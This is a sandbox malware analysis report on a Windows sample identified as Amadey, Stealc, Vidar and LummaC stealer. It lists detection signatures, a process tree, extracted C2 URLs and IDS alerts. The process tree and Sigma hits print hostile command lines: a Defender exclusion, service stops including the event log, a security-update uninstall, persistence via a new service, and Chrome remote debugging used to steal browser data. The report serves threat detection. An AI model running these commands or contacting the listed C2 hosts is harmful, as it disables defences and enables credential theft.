Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1553357
MD5:	ae6ab1aca8b68f61f6c9ecb97d418fb1
SHA1:	2b5c95867bd0231103cf1d900ce012c9019149db
SHA256:	2d1685358e826d1f0cad55eb2bae7fb87b4e40222dc947d2dfc217911ba6634c
Tags:	exeuser-Bitsight
Infos:

Detection

Amadey, LummaC Stealer, Stealc, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Attempt to bypass Chrome Application-Bound Encryption

Detected unpacking (changes PE section rights)

Found malware configuration

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Disable power options

Sigma detected: Stop EventLog

Suricata IDS alerts for network traffic

Yara detected Amadeys stealer DLL

Yara detected LummaC Stealer

Yara detected Powershell download and execute

Yara detected Stealc

Yara detected Vidar stealer

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Creates a thread in another existing process (thread injection)

Creates multiple autostart registry keys

Drops PE files to the document folder of the user

Drops PE files to the user root directory

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

Hooks files or directories query functions (used to hide files and directories)

Hooks processes query functions (used to hide processes)

Hooks registry keys query functions (used to hide registry keys)

Injects a PE file into a foreign processes

Injects code into the Windows Explorer (explorer.exe)

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Modifies power options to not sleep / hibernate

Modifies the context of a thread in another process (thread injection)

Modifies the prolog of user mode functions (user mode inline hooks)

PE file contains section with special chars

Potentially malicious time measurement code found

Sigma detected: New RUN Key Pointing to Suspicious Folder

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Tries to steal Mail credentials (via file / registry access)

Uses powercfg.exe to modify the power settings

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Checks for debuggers (devices)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates job files (autostart)

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Drops PE files to the user directory

Enables debug privileges

Entry point lies outside standard sections

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries disk information (often used to detect virtual machines)

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Browser Started with Remote Debugging

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Powershell Defender Exclusion

Sigma detected: Uncommon Svchost Parent Process

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

file.exe (PID: 7312 cmdline: "C:\Users\user\Desktop\file.exe" MD5: AE6AB1ACA8B68F61F6C9ECB97D418FB1)

chrome.exe (PID: 7508 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 7720 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2232 --field-trial-handle=2176,i,15720693888833450956,6277082314804719392,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

cmd.exe (PID: 7540 cmdline: "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\DocumentsHDGDGHCAAK.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

DocumentsHDGDGHCAAK.exe (PID: 4076 cmdline: "C:\Users\user\DocumentsHDGDGHCAAK.exe" MD5: EC648136F42F41AEE2EFDC8361EA2508)

skotes.exe (PID: 7852 cmdline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: EC648136F42F41AEE2EFDC8361EA2508)

svchost.exe (PID: 7620 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

skotes.exe (PID: 7924 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: EC648136F42F41AEE2EFDC8361EA2508)

skotes.exe (PID: 7956 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: EC648136F42F41AEE2EFDC8361EA2508)

test2.exe (PID: 2812 cmdline: "C:\Users\user\AppData\Local\Temp\1005413001\test2.exe" MD5: DCC94134DB4DA64356CDCD25E7E88625)

powershell.exe (PID: 3704 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 1732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 6572 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

cmd.exe (PID: 6784 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 2104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

wusa.exe (PID: 4268 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)

sc.exe (PID: 7128 cmdline: C:\Windows\system32\sc.exe stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 6340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 1352 cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 6016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 7528 cmdline: C:\Windows\system32\sc.exe stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 7900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 3396 cmdline: C:\Windows\system32\sc.exe stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 3796 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 7240 cmdline: C:\Windows\system32\sc.exe stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 7448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powercfg.exe (PID: 7892 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)

conhost.exe (PID: 7320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powercfg.exe (PID: 4432 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)

conhost.exe (PID: 7364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powercfg.exe (PID: 7328 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)

conhost.exe (PID: 7356 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powercfg.exe (PID: 7340 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)

conhost.exe (PID: 7372 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

dialer.exe (PID: 7348 cmdline: C:\Windows\system32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)

winlogon.exe (PID: 552 cmdline: winlogon.exe MD5: F8B41A1B3E569E7E6F990567F21DCE97)

lsass.exe (PID: 628 cmdline: C:\Windows\system32\lsass.exe MD5: A1CC00332BBF370654EE3DC8CDC8C95A)

svchost.exe (PID: 920 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

dwm.exe (PID: 988 cmdline: "dwm.exe" MD5: 5C27608411832C5B39BA04E33D53536C)

svchost.exe (PID: 364 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 356 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 696 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 592 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1044 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1084 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1200 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1252 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

sc.exe (PID: 7392 cmdline: C:\Windows\system32\sc.exe delete "HYOIZPGT" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 7316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 8004 cmdline: C:\Windows\system32\sc.exe create "HYOIZPGT" binpath= "C:\ProgramData\rtrgvxkbkvbm\ekteefutuwre.exe" start= "auto" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 7992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 7848 cmdline: C:\Windows\system32\sc.exe stop eventlog MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 8156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 7828 cmdline: C:\Windows\system32\sc.exe start "HYOIZPGT" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 7504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 1060 cmdline: C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\user\AppData\Local\Temp\1005413001\test2.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

choice.exe (PID: 8048 cmdline: choice /C Y /N /D Y /T 3 MD5: 1A9804F0C374283B094E9E55DC5EE128)

ekteefutuwre.exe (PID: 8056 cmdline: C:\ProgramData\rtrgvxkbkvbm\ekteefutuwre.exe MD5: DCC94134DB4DA64356CDCD25E7E88625)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/40483/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: StealC

{"C2 url": "185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}

Threatname: Amadey

{"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Stealc_1	Yara detected Stealc	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.1998156221.00000000015DE000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000003.1677868840.0000000005270000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0000000C.00000002.2928876012.00000000007B1000.00000040.00000001.01000000.0000000E.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000000B.00000002.2074643854.00000000007B1000.00000040.00000001.01000000.0000000E.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000009.00000002.2014400254.0000000000681000.00000040.00000001.01000000.0000000B.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000000A.00000002.2064829735.00000000007B1000.00000040.00000001.01000000.0000000E.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000000.00000002.1997064501.00000000001D1000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: file.exe PID: 7312	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: file.exe PID: 7312	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: file.exe PID: 7312	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: file.exe PID: 7312	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Click to see the 6 entries

Unpacked PEs

Source	Rule	Description	Author
10.2.skotes.exe.7b0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
9.2.DocumentsHDGDGHCAAK.exe.680000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
11.2.skotes.exe.7b0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
12.2.skotes.exe.7b0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security

Sigma Signatures

Change of critical system settings

Sigma detected: Disable power options

Source: Process started

Author: Joe Security: Data: Command: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine|base64offset|contains: , Image: C:\Windows\System32\powercfg.exe, NewProcessName: C:\Windows\System32\powercfg.exe, OriginalFileName: C:\Windows\System32\powercfg.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1005413001\test2.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1005413001\test2.exe, ParentProcessId: 2812, ParentProcessName: test2.exe, ProcessCommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, ProcessId: 7892, ProcessName: powercfg.exe

System Summary

Sigma detected: New RUN Key Pointing to Suspicious Folder

Source: Registry Key set

Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\1005414001\96b31e1a32.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 7956, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\96b31e1a32.exe

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1005413001\test2.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1005413001\test2.exe, ParentProcessId: 2812, ParentProcessName: test2.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 3704, ProcessName: powershell.exe

Sigma detected: Browser Started with Remote Debugging

Source: Process started

Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 7312, ParentProcessName: file.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default", ProcessId: 7508, ProcessName: chrome.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\1005414001\96b31e1a32.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 7956, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\96b31e1a32.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\Windows\system32\dialer.exe, ParentImage: C:\Windows\System32\dialer.exe, ParentProcessId: 7348, ParentProcessName: dialer.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, ProcessId: 920, ProcessName: svchost.exe

Sigma detected: New Service Creation Using Sc.EXE

Source: Process started

Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: C:\Windows\system32\sc.exe create "HYOIZPGT" binpath= "C:\ProgramData\rtrgvxkbkvbm\ekteefutuwre.exe" start= "auto", CommandLine: C:\Windows\system32\sc.exe create "HYOIZPGT" binpath= "C:\ProgramData\rtrgvxkbkvbm\ekteefutuwre.exe" start= "auto", CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1005413001\test2.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1005413001\test2.exe, ParentProcessId: 2812, ParentProcessName: test2.exe, ProcessCommandLine: C:\Windows\system32\sc.exe create "HYOIZPGT" binpath= "C:\ProgramData\rtrgvxkbkvbm\ekteefutuwre.exe" start= "auto", ProcessId: 8004, ProcessName: sc.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1005413001\test2.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1005413001\test2.exe, ParentProcessId: 2812, ParentProcessName: test2.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 3704, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7620, ProcessName: svchost.exe

HIPS / PFW / Operating System Protection Evasion

Sigma detected: Stop EventLog

Source: Process started

Author: Joe Security: Data: Command: C:\Windows\system32\sc.exe stop eventlog, CommandLine: C:\Windows\system32\sc.exe stop eventlog, CommandLine|base64offset|contains: ), Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1005413001\test2.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1005413001\test2.exe, ParentProcessId: 2812, ParentProcessName: test2.exe, ProcessCommandLine: C:\Windows\system32\sc.exe stop eventlog, ProcessId: 7848, ProcessName: sc.exe

Suricata Signatures

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-11T01:14:14.675922+0100	2022930	1	A Network Trojan was detected	172.202.163.200	443	192.168.2.4	49756	TCP
2024-11-11T01:14:52.852622+0100	2022930	1	A Network Trojan was detected	172.202.163.200	443	192.168.2.4	49763	TCP

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-11T01:15:39.597351+0100	2028371	3	Unknown Traffic	192.168.2.4	50011	188.114.96.3	443	TCP
2024-11-11T01:15:40.975986+0100	2028371	3	Unknown Traffic	192.168.2.4	50021	188.114.96.3	443	TCP
2024-11-11T01:15:42.219565+0100	2028371	3	Unknown Traffic	192.168.2.4	50028	188.114.96.3	443	TCP
2024-11-11T01:15:44.057271+0100	2028371	3	Unknown Traffic	192.168.2.4	50039	188.114.96.3	443	TCP
2024-11-11T01:15:45.882560+0100	2028371	3	Unknown Traffic	192.168.2.4	50040	188.114.96.3	443	TCP
2024-11-11T01:15:47.505855+0100	2028371	3	Unknown Traffic	192.168.2.4	50041	188.114.96.3	443	TCP
2024-11-11T01:15:49.406213+0100	2028371	3	Unknown Traffic	192.168.2.4	50043	188.114.96.3	443	TCP
2024-11-11T01:15:52.171144+0100	2028371	3	Unknown Traffic	192.168.2.4	50046	188.114.96.3	443	TCP
2024-11-11T01:15:53.363072+0100	2028371	3	Unknown Traffic	192.168.2.4	50047	188.114.96.3	443	TCP
2024-11-11T01:15:54.158990+0100	2028371	3	Unknown Traffic	192.168.2.4	50049	188.114.96.3	443	TCP
2024-11-11T01:15:54.589427+0100	2028371	3	Unknown Traffic	192.168.2.4	50050	188.114.96.3	443	TCP
2024-11-11T01:15:55.827242+0100	2028371	3	Unknown Traffic	192.168.2.4	50053	188.114.96.3	443	TCP
2024-11-11T01:15:57.102595+0100	2028371	3	Unknown Traffic	192.168.2.4	50054	188.114.96.3	443	TCP
2024-11-11T01:15:59.943137+0100	2028371	3	Unknown Traffic	192.168.2.4	50055	188.114.96.3	443	TCP
2024-11-11T01:16:01.100903+0100	2028371	3	Unknown Traffic	192.168.2.4	50056	188.114.96.3	443	TCP
2024-11-11T01:16:01.434055+0100	2028371	3	Unknown Traffic	192.168.2.4	50057	188.114.96.3	443	TCP
2024-11-11T01:16:05.494477+0100	2028371	3	Unknown Traffic	192.168.2.4	50059	188.114.96.3	443	TCP
2024-11-11T01:16:05.749423+0100	2028371	3	Unknown Traffic	192.168.2.4	50061	188.114.96.3	443	TCP
